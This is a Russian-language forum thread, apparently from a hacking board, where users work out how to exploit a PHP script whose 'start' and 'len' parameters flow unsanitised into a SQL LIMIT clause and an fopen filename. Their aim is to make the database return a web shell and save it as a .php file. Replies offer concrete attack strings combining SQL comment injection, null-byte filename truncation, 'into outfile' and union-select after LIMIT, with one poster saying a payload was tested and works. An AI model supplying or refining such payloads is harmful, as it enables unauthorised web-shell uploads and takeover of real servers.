Имеется запрос вида script.php?start=0&len=20 в скрипте он обрабатывается так $sql="SELECT shell FROM table WHERE id=1 LIMIT".$start.",".$len; $file = fopen("file".$start."_".$len"."html"); fputs ($file, [РЕЗУЛЬТАТ СКУЛЬ ЗАПРОСА, АКА ШЕЛЛ]); fclose ($file); Как составить запрос так, чтобы и мускуль вывел шелл и файл создать с пхп расширением? P>S>нульбайт можно вставлять и любые кавычки, т.е. подобных запретов нет
script.php?start=1,1--&len=.php%00 так пойдет? это такая фишка, что fopen написана не полностью и с лишней кавычкой? $file = fopen("file".$start."_".$len."html",'w');
пзл, не придирайтесь к синтаксису, писал чтобы передать смысл. RE:"script.php?start=1,1--&len=.php%00" - такой вариант не подойдет, такой вид коммента(--) фильтруеца к сожалению
Joker-jar, почему не пройдет? толькочто проверил локально - работает. script.php?start=%201,1--&len=.php%00 Xex, может, попробовать залить через "into outfile"? Или нет прав?
Как я понял, нужно не только создать php файл, но еще и шелл залить. Тогда инъекция нужна. Инъекция после LIMIT. Если в $start передавать что-нибудь типа 1000000+union+select+... то придется коментить остальную часть запроса Code: ",".$len; , но * не пропустится в имя файла...
